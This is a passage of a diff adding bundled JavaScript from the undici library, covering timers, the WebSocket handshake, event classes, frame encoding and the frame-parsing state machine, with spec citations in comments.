= [] + +function onTimeout () { + fastNow = Date.now() + + let len = fastTimers.length + let idx = 0 + while (idx < len) { + const timer = fastTimers[idx] + + if (timer.state === 0) { + timer.state = fastNow + timer.delay + } else if (timer.state > 0 && fastNow >= timer.state) { + timer.state = -1 + timer.callback(timer.opaque) + } + + if (timer.state === -1) { + timer.state = -2 + if (idx !== len - 1) { + fastTimers[idx] = fastTimers.pop() + } else { + fastTimers.pop() + } + len -= 1 + } else { + idx += 1 + } + } + + if (fastTimers.length > 0) { + refreshTimeout() + } +} + +function refreshTimeout () { + if (fastNowTimeout && fastNowTimeout.refresh) { + fastNowTimeout.refresh() + } else { + clearTimeout(fastNowTimeout) + fastNowTimeout = setTimeout(onTimeout, 1e3) + if (fastNowTimeout.unref) { + fastNowTimeout.unref() + } + } +} + +class Timeout { + constructor (callback, delay, opaque) { + this.callback = callback + this.delay = delay + this.opaque = opaque + + // -2 not in timer list + // -1 in timer list but inactive + // 0 in timer list waiting for time + // > 0 in timer list waiting for time to expire + this.state = -2 + + this.refresh() + } + + refresh () { + if (this.state === -2) { + fastTimers.push(this) + if (!fastNowTimeout || fastTimers.length === 1) { + refreshTimeout() + } + } + + this.state = 0 + } + + clear () { + this.state = -1 + } +} + +module.exports = { + setTimeout (callback, delay, opaque) { + return delay < 1e3 + ? setTimeout(callback, delay, opaque) + : new Timeout(callback, delay, opaque) + }, + clearTimeout (timeout) { + if (timeout instanceof Timeout) { + timeout.clear() + } else { + clearTimeout(timeout) + } + } +} + + +/***/ }), + +/***/ 5354: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const diagnosticsChannel = __nccwpck_require__(7643) +const { uid, states } = __nccwpck_require__(9188) +const { + kReadyState, + kSentClose, + kByteParser, + kReceivedClose +} = __nccwpck_require__(7578) +const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) +const { CloseEvent } = __nccwpck_require__(2611) +const { makeRequest } = __nccwpck_require__(8359) +const { fetching } = __nccwpck_require__(4881) +const { Headers } = __nccwpck_require__(554) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { kHeadersList } = __nccwpck_require__(2785) + +const channels = {} +channels.open = diagnosticsChannel.channel('undici:websocket:open') +channels.close = diagnosticsChannel.channel('undici:websocket:close') +channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +/** + * @see https://websockets.spec.whatwg.org/#concept-websocket-establish + * @param {URL} url + * @param {string|string[]} protocols + * @param {import('./websocket').WebSocket} ws + * @param {(response: any) => void} onEstablish + * @param {Partial} options + */ +function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { + // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s + // scheme is "ws", and to "https" otherwise. + const requestURL = url + + requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' + + // 2. Let request be a new request, whose URL is requestURL, client is client, + // service-workers mode is "none", referrer is "no-referrer", mode is + // "websocket", credentials mode is "include", cache mode is "no-store" , + // and redirect mode is "error". + const request = makeRequest({ + urlList: [requestURL], + serviceWorkers: 'none', + referrer: 'no-referrer', + mode: 'websocket', + credentials: 'include', + cache: 'no-store', + redirect: 'error' + }) + + // Note: undici extension, allow setting custom headers. + if (options.headers) { + const headersList = new Headers(options.headers)[kHeadersList] + + request.headersList = headersList + } + + // 3. Append (`Upgrade`, `websocket`) to request’s header list. + // 4. Append (`Connection`, `Upgrade`) to request’s header list. + // Note: both of these are handled by undici currently. + // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 + + // 5. Let keyValue be a nonce consisting of a randomly selected + // 16-byte value that has been forgiving-base64-encoded and + // isomorphic encoded. + const keyValue = crypto.randomBytes(16).toString('base64') + + // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s + // header list. + request.headersList.append('sec-websocket-key', keyValue) + + // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s + // header list. + request.headersList.append('sec-websocket-version', '13') + + // 8. For each protocol in protocols, combine + // (`Sec-WebSocket-Protocol`, protocol) in request’s header + // list. + for (const protocol of protocols) { + request.headersList.append('sec-websocket-protocol', protocol) + } + + // 9. Let permessageDeflate be a user-agent defined + // "permessage-deflate" extension header value. + // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 + // TODO: enable once permessage-deflate is supported + const permessageDeflate = '' // 'permessage-deflate; 15' + + // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to + // request’s header list. + // request.headersList.append('sec-websocket-extensions', permessageDeflate) + + // 11. Fetch request with useParallelQueue set to true, and + // processResponse given response being these steps: + const controller = fetching({ + request, + useParallelQueue: true, + dispatcher: options.dispatcher ?? getGlobalDispatcher(), + processResponse (response) { + // 1. If response is a network error or its status is not 101, + // fail the WebSocket connection. + if (response.type === 'error' || response.status !== 101) { + failWebsocketConnection(ws, 'Received network error or non-101 status code.') + return + } + + // 2. If protocols is not the empty list and extracting header + // list values given `Sec-WebSocket-Protocol` and response’s + // header list results in null, failure, or the empty byte + // sequence, then fail the WebSocket connection. + if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Server did not respond with sent protocols.') + return + } + + // 3. Follow the requirements stated step 2 to step 6, inclusive, + // of the last set of steps in section 4.1 of The WebSocket + // Protocol to validate response. This either results in fail + // the WebSocket connection or the WebSocket connection is + // established. + + // 2. If the response lacks an |Upgrade| header field or the |Upgrade| + // header field contains a value that is not an ASCII case- + // insensitive match for the value "websocket", the client MUST + // _Fail the WebSocket Connection_. + if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { + failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') + return + } + + // 3. If the response lacks a |Connection| header field or the + // |Connection| header field doesn't contain a token that is an + // ASCII case-insensitive match for the value "Upgrade", the client + // MUST _Fail the WebSocket Connection_. + if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { + failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') + return + } + + // 4. If the response lacks a |Sec-WebSocket-Accept| header field or + // the |Sec-WebSocket-Accept| contains a value other than the + // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- + // Key| (as a string, not base64-decoded) with the string "258EAFA5- + // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and + // trailing whitespace, the client MUST _Fail the WebSocket + // Connection_. + const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') + const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') + if (secWSAccept !== digest) { + failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') + return + } + + // 5. If the response includes a |Sec-WebSocket-Extensions| header + // field and this header field indicates the use of an extension + // that was not present in the client's handshake (the server has + // indicated an extension not requested by the client), the client + // MUST _Fail the WebSocket Connection_. (The parsing of this + // header field to determine which extensions are requested is + // discussed in Section 9.1.) + const secExtension = response.headersList.get('Sec-WebSocket-Extensions') + + if (secExtension !== null && secExtension !== permessageDeflate) { + failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') + return + } + + // 6. If the response includes a |Sec-WebSocket-Protocol| header field + // and this header field indicates the use of a subprotocol that was + // not present in the client's handshake (the server has indicated a + // subprotocol not requested by the client), the client MUST _Fail + // the WebSocket Connection_. + const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') + + if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') + return + } + + response.socket.on('data', onSocketData) + response.socket.on('close', onSocketClose) + response.socket.on('error', onSocketError) + + if (channels.open.hasSubscribers) { + channels.open.publish({ + address: response.socket.address(), + protocol: secProtocol, + extensions: secExtension + }) + } + + onEstablish(response) + } + }) + + return controller +} + +/** + * @param {Buffer} chunk + */ +function onSocketData (chunk) { + if (!this.ws[kByteParser].write(chunk)) { + this.pause() + } +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 + */ +function onSocketClose () { + const { ws } = this + + // If the TCP connection was closed after the + // WebSocket closing handshake was completed, the WebSocket connection + // is said to have been closed _cleanly_. + const wasClean = ws[kSentClose] && ws[kReceivedClose] + + let code = 1005 + let reason = '' + + const result = ws[kByteParser].closingInfo + + if (result) { + code = result.code ?? 1005 + reason = result.reason + } else if (!ws[kSentClose]) { + // If _The WebSocket + // Connection is Closed_ and no Close control frame was received by the + // endpoint (such as could occur if the underlying transport connection + // is lost), _The WebSocket Connection Close Code_ is considered to be + // 1006. + code = 1006 + } + + // 1. Change the ready state to CLOSED (3). + ws[kReadyState] = states.CLOSED + + // 2. If the user agent was required to fail the WebSocket + // connection, or if the WebSocket connection was closed + // after being flagged as full, fire an event named error + // at the WebSocket object. + // TODO + + // 3. Fire an event named close at the WebSocket object, + // using CloseEvent, with the wasClean attribute + // initialized to true if the connection closed cleanly + // and false otherwise, the code attribute initialized to + // the WebSocket connection close code, and the reason + // attribute initialized to the result of applying UTF-8 + // decode without BOM to the WebSocket connection close + // reason. + fireEvent('close', ws, CloseEvent, { + wasClean, code, reason + }) + + if (channels.close.hasSubscribers) { + channels.close.publish({ + websocket: ws, + code, + reason + }) + } +} + +function onSocketError (error) { + const { ws } = this + + ws[kReadyState] = states.CLOSING + + if (channels.socketError.hasSubscribers) { + channels.socketError.publish(error) + } + + this.destroy() +} + +module.exports = { + establishWebSocketConnection +} + + +/***/ }), + +/***/ 9188: +/***/ ((module) => { + +"use strict"; + + +// This is a Globally Unique Identifier unique used +// to validate that the endpoint accepts websocket +// connections. +// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 +const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +const states = { + CONNECTING: 0, + OPEN: 1, + CLOSING: 2, + CLOSED: 3 +} + +const opcodes = { + CONTINUATION: 0x0, + TEXT: 0x1, + BINARY: 0x2, + CLOSE: 0x8, + PING: 0x9, + PONG: 0xA +} + +const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 + +const parserStates = { + INFO: 0, + PAYLOADLENGTH_16: 2, + PAYLOADLENGTH_64: 3, + READ_DATA: 4 +} + +const emptyBuffer = Buffer.allocUnsafe(0) + +module.exports = { + uid, + staticPropertyDescriptors, + states, + opcodes, + maxUnsigned16Bit, + parserStates, + emptyBuffer +} + + +/***/ }), + +/***/ 2611: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { MessagePort } = __nccwpck_require__(1267) + +/** + * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent + */ +class MessageEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.MessageEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get data () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.data + } + + get origin () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.origin + } + + get lastEventId () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.lastEventId + } + + get source () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.source + } + + get ports () { + webidl.brandCheck(this, MessageEvent) + + if (!Object.isFrozen(this.#eventInit.ports)) { + Object.freeze(this.#eventInit.ports) + } + + return this.#eventInit.ports + } + + initMessageEvent ( + type, + bubbles = false, + cancelable = false, + data = null, + origin = '', + lastEventId = '', + source = null, + ports = [] + ) { + webidl.brandCheck(this, MessageEvent) + + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) + + return new MessageEvent(type, { + bubbles, cancelable, data, origin, lastEventId, source, ports + }) + } +} + +/** + * @see https://websockets.spec.whatwg.org/#the-closeevent-interface + */ +class CloseEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.CloseEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get wasClean () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.wasClean + } + + get code () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.code + } + + get reason () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.reason + } +} + +// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface +class ErrorEvent extends Event { + #eventInit + + constructor (type, eventInitDict) { + webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) + + super(type, eventInitDict) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? {}) + + this.#eventInit = eventInitDict + } + + get message () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.message + } + + get filename () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.filename + } + + get lineno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.lineno + } + + get colno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.colno + } + + get error () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.error + } +} + +Object.defineProperties(MessageEvent.prototype, { + [Symbol.toStringTag]: { + value: 'MessageEvent', + configurable: true + }, + data: kEnumerableProperty, + origin: kEnumerableProperty, + lastEventId: kEnumerableProperty, + source: kEnumerableProperty, + ports: kEnumerableProperty, + initMessageEvent: kEnumerableProperty +}) + +Object.defineProperties(CloseEvent.prototype, { + [Symbol.toStringTag]: { + value: 'CloseEvent', + configurable: true + }, + reason: kEnumerableProperty, + code: kEnumerableProperty, + wasClean: kEnumerableProperty +}) + +Object.defineProperties(ErrorEvent.prototype, { + [Symbol.toStringTag]: { + value: 'ErrorEvent', + configurable: true + }, + message: kEnumerableProperty, + filename: kEnumerableProperty, + lineno: kEnumerableProperty, + colno: kEnumerableProperty, + error: kEnumerableProperty +}) + +webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.MessagePort +) + +const eventInit = [ + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.MessageEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'data', + converter: webidl.converters.any, + defaultValue: null + }, + { + key: 'origin', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lastEventId', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'source', + // Node doesn't implement WindowProxy or ServiceWorker, so the only + // valid value for source is a MessagePort. + converter: webidl.nullableConverter(webidl.converters.MessagePort), + defaultValue: null + }, + { + key: 'ports', + converter: webidl.converters['sequence'], + get defaultValue () { + return [] + } + } +]) + +webidl.converters.CloseEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'wasClean', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'code', + converter: webidl.converters['unsigned short'], + defaultValue: 0 + }, + { + key: 'reason', + converter: webidl.converters.USVString, + defaultValue: '' + } +]) + +webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'message', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'filename', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lineno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'colno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'error', + converter: webidl.converters.any + } +]) + +module.exports = { + MessageEvent, + CloseEvent, + ErrorEvent +} + + +/***/ }), + +/***/ 5444: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxUnsigned16Bit } = __nccwpck_require__(9188) + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +class WebsocketFrameSend { + /** + * @param {Buffer|undefined} data + */ + constructor (data) { + this.frameData = data + this.maskKey = crypto.randomBytes(4) + } + + createFrame (opcode) { + const bodyLength = this.frameData?.byteLength ?? 0 + + /** @type {number} */ + let payloadLength = bodyLength // 0-125 + let offset = 6 + + if (bodyLength > maxUnsigned16Bit) { + offset += 8 // payload length is next 8 bytes + payloadLength = 127 + } else if (bodyLength > 125) { + offset += 2 // payload length is next 2 bytes + payloadLength = 126 + } + + const buffer = Buffer.allocUnsafe(bodyLength + offset) + + // Clear first 2 bytes, everything else is overwritten + buffer[0] = buffer[1] = 0 + buffer[0] |= 0x80 // FIN + buffer[0] = (buffer[0] & 0xF0) + opcode // opcode + + /*! ws. MIT License. Einar Otto Stangvik */ + buffer[offset - 4] = this.maskKey[0] + buffer[offset - 3] = this.maskKey[1] + buffer[offset - 2] = this.maskKey[2] + buffer[offset - 1] = this.maskKey[3] + + buffer[1] = payloadLength + + if (payloadLength === 126) { + buffer.writeUInt16BE(bodyLength, 2) + } else if (payloadLength === 127) { + // Clear extended payload length + buffer[2] = buffer[3] = 0 + buffer.writeUIntBE(bodyLength, 4, 6) + } + + buffer[1] |= 0x80 // MASK + + // mask body + for (let i = 0; i < bodyLength; i++) { + buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] + } + + return buffer + } +} + +module.exports = { + WebsocketFrameSend +} + + +/***/ }), + +/***/ 1688: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Writable } = __nccwpck_require__(2781) +const diagnosticsChannel = __nccwpck_require__(7643) +const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) +const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) +const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) +const { WebsocketFrameSend } = __nccwpck_require__(5444) + +// This code was influenced by ws released under the MIT license. +// Copyright (c) 2011 Einar Otto Stangvik +// Copyright (c) 2013 Arnout Kazemier and contributors +// Copyright (c) 2016 Luigi Pinca and contributors + +const channels = {} +channels.ping = diagnosticsChannel.channel('undici:websocket:ping') +channels.pong = diagnosticsChannel.channel('undici:websocket:pong') + +class ByteParser extends Writable { + #buffers = [] + #byteOffset = 0 + + #state = parserStates.INFO + + #info = {} + #fragments = [] + + constructor (ws) { + super() + + this.ws = ws + } + + /** + * @param {Buffer} chunk + * @param {() => void} callback + */ + _write (chunk, _, callback) { + this.#buffers.push(chunk) + this.#byteOffset += chunk.length + + this.run(callback) + } + + /** + * Runs whenever a new chunk is received. + * Callback is called whenever there are no more chunks buffering, + * or not enough bytes are buffered to parse. + */ + run (callback) { + while (true) { + if (this.#state === parserStates.INFO) { + // If there aren't enough bytes to parse the payload length, etc. + if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.fin = (buffer[0] & 0x80) !== 0 + this.#info.opcode = buffer[0] & 0x0F + + // If we receive a fragmented message, we use the type of the first + // frame to parse the full message as binary/text, when it's terminated + this.#info.originalOpcode ??= this.#info.opcode + + this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION + + if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { + // Only text and binary frames can be fragmented + failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') + return + } + + const payloadLength = buffer[1] & 0x7F + + if (payloadLength <= 125) { + this.#info.payloadLength = payloadLength + this.#state = parserStates.READ_DATA + } else if (payloadLength === 126) { + this.#state = parserStates.PAYLOADLENGTH_16 + } else if (payloadLength === 127) { + this.#state = parserStates.PAYLOADLENGTH_64 + } + + if (this.#info.fragmented && payloadLength > 125) { + // A fragmented frame can't be fragmented itself + failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') + return + } else if ( + (this.#info.opcode === opcodes.PING || + this.#info.opcode === opcodes.PONG || + this.#info.opcode === opcodes.CLOSE) && + payloadLength > 125 + ) { + // Control frames can have a payload length of 125 bytes MAX + failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') + return + } else if (this.#info.opcode === opcodes.CLOSE) { + if (payloadLength === 1) { + failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') + return + } + + const body = this.consume(payloadLength) + + this.#info.closeInfo = this.parseCloseBody(false, body) + + if (!this.ws[kSentClose]) { + // If an endpoint receives a Close frame and did not previously send a + // Close frame, the endpoint MUST send a Close frame in response. (When + // sending a Close frame in response, the endpoint typically echos the + // status code it received.) + const body = Buffer.allocUnsafe(2) + body.writeUInt16BE(this.#info.closeInfo.code, 0) + const closeFrame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write( + closeFrame.createFrame(opcodes.CLOSE), + (err) => { + if (!err) { + this.ws[kSentClose] = true + } + } + ) + } + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this.ws[kReadyState] = states.CLOSING + this.ws[kReceivedClose] = true + + this.end() + + return + } else if (this.#info.opcode === opcodes.PING) { + // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in + // response, unless it already received a Close frame. + // A Pong frame sent in response to a Ping frame must have identical + // "Application data" + + const body = this.consume(payloadLength) + + if (!this.ws[kReceivedClose]) { + const frame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) + + if (channels.ping.hasSubscribers) { + channels.ping.publish({ + payload: body + }) + } + } + + this.#state = parserStates.INFO + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } else if (this.#info.opcode === opcodes.PONG) { + // A Pong frame MAY be sent unsolicited. This serves as a + // unidirectional heartbeat. A response to an unsolicited Pong frame is + // not expected. + + const body = this.consume(payloadLength) + + if (channels.pong.hasSubscribers) { + channels.pong.publish({ + payload: body + }) + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } + } else if (this.#state === parserStates.PAYLOADLENGTH_16) { + if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.payloadLength = buffer.readUInt16BE(0) + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.PAYLOADLENGTH_64) { + if (this.#byteOffset < 8) { + return callback() + } + + const buffer = this.consume(8) + const upper = buffer.readUInt32BE(0) + + // 2^31 is the maxinimum bytes an arraybuffer can contain + // on 32-bit systems. Although, on 64-bit systems, this is + // 2^53-1 bytes. + // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e + if (upper > 2 ** 31 - 1) { + failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') + return + } + + const lower = buffer.readUInt32BE(4) + + this.#info.payloadLength = (upper << 8) + lower + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.READ_DATA) { + if (this.#byteOffset < this.#info.payloadLength) { + // If there is still more data in this chunk that needs to be read + return callback() + } else if (this.#byteOffset >= this.#info.payloadLength) { + // If the server sent multiple frames in a single chunk + + const body = this.consume(this.#info.payloadLength) + + this.#fragments.push(body) + + // If the frame is unfragmented, or a fragmented frame was terminated, + // a message was received + if (!this.#info.fragmented || (this.#info.fin && this.#info.opcode === opcodes.CONTINUATION)) { + const fullMessage = Buffer.concat(this.#fragments) + + websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) + + this.#info = {} + this.#fragments.length = 0 + } + + this.#state = parserStates.INFO + } + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + break + } + } + } + + /** + * Take n bytes from the buffered Buffers + * @param {number} n + * @returns {Buffer|null} + */ + consume (n) { + if (n > this.#byteOffset) { + return null + } else if (n === 0) { + return emptyBuffer + } + + if (this.#buffers[0].length === n) { + this.#byteOffset -= this.#buffers[0].length + return this.#buffers.shift() + } + + const buffer = Buffer.allocUnsafe(n) + let offset = 0 + + while (offset !== n) { + const next = this.#buffers[0] + const { length } = next + + if (length + offset === n) { + buffer.set(this.#buffers.shift(), offset) + break + } else if (length + offset > n) { + buffer.set(next.subarray(0, n - offset), offset) + this.#buffers[0] = next.subarray(n - offset) + break + } else { + buffer.set(this.#buffers.shift(), offset) + offset += next.length + } + } + + this.#byteOffset -= n + + return buffer + } + + parseCloseBody (onlyCode, data) { + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 + /** @type {number|undefined} */ + let code + + if (data.length >= 2) { + // _The WebSocket Connection Close Code_ is + // defined as the status code (Section 7.4) contained in the first Close + // control frame received by the application + code = data.readUInt16BE(0) + } + + if (onlyCode) { + if (!isValidStatusCode(code)) { + return null + } + + return { code } + } + + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 + /** @type {Buffer} */ + let reason = data.subarray(2) + + // Remove BOM + if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { + reason = reason.subarray(3) + } + + if (code !== undefined && !isValidStatusCode(code)) { + return null + } + + try { + // TODO: optimize this + reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) + } catch { + return null + } + + return { code, reason } + } + + get closingInfo () { + return this.#info.closeInfo + } +} + +module.exports = { + ByteParser +} + + +/***/ }), + +/***/ 7578: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kWebSocketURL: Symbol('url'), + kReadyState: Symbol('ready state'), + kController: Symbol('controller'), + kResponse: Symbol('response'), + kBinaryType: Symbol('binary type'), + kSentClose: Symbol('sent close'), + kReceivedClose: Symbol('received close'), + kByteParser: Symbol('byte parser') +} + + +/***/ }), + +/***/ 5515: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) +const { states, opcodes } = __nccwpck_require__(9188) +const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) + +/* globals Blob */ + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isEstablished (ws) { + // If the server's response is validated as provided for above, it is + // said that _The WebSocket Connection is Established_ and that the + // WebSocket Connection is in the OPEN state. + return ws[kReadyState] === states.OPEN +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosing (ws) { + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + return ws[kReadyState] === states.CLOSING +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosed (ws) { + return ws[kReadyState] === states.CLOSED +} + +/** + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e + * @param {EventTarget} target + * @param {EventInit | undefined} eventInitDict + */ +function fireEvent (e, target, eventConstructor = Event, eventInitDict) { + // 1. If eventConstructor is not given, then let eventConstructor be Event. + + // 2. Let event be the result of creating an event given eventConstructor, + // in the relevant realm of target. + // 3. Initialize event’s type attribute to e. + const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap + + // 4. Initialize any other IDL attributes of event as described in the + // invocation of this algorithm. + + // 5. Return the result of dispatching event at target, with legacy target + // override flag set if set. + target.dispatchEvent(event) +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @param {import('./websocket').WebSocket} ws + * @param {number} type Opcode + * @param {Buffer} data application data + */ +function websocketMessageReceived (ws, type, data) { + // 1. If ready state is not OPEN (1), then return. + if (ws[kReadyState] !== states.OPEN) { + return + } + + // 2. Let dataForEvent be determined by switching on type and binary type: + let dataForEvent + + if (type === opcodes.TEXT) { + // -> type indicates that the data is Text + // a new DOMString containing data + try { + dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) + } catch { + failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') + return + } + } else if (type === opcodes.BINARY) { + if (ws[kBinaryType] === 'blob') { + // -> type indicates that the data is Binary and binary type is "blob" + // a new Blob object, created in the relevant Realm of the WebSocket + // object, that represents data as its raw data + dataForEvent = new Blob([data]) + } else { + // -> type indicates that the data is Binary and binary type is "arraybuffer" + // a new ArrayBuffer object, created in the relevant Realm of the + // WebSocket object, whose contents are data + dataForEvent = new Uint8Array(data).buffer + } + } + + // 3. Fire an event named message at the WebSocket object, using MessageEvent, + // with the origin attribute initialized to the serialization of the WebSocket + // object’s url's origin, and the data attribute initialized to dataForEvent. + fireEvent('message', ws, MessageEvent, { + origin: ws[kWebSocketURL].origin, + data: dataForEvent + }) +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455 + * @see https://datatracker.ietf.org/doc/html/rfc2616 + * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 + * @param {string} protocol + */ +function isValidSubprotocol (protocol) { + // If present, this value indicates one + // or more comma-separated subprotocol the client wishes to speak, + // ordered by preference. The elements that comprise this value + // MUST be non-empty strings with characters in the range U+0021 to + // U+007E not including separator characters as defined in + // [RFC2616] and MUST all be unique strings. + if (protocol.length === 0) { + return false + } + + for (const char of protocol) { + const code = char.charCodeAt(0) + + if ( + code < 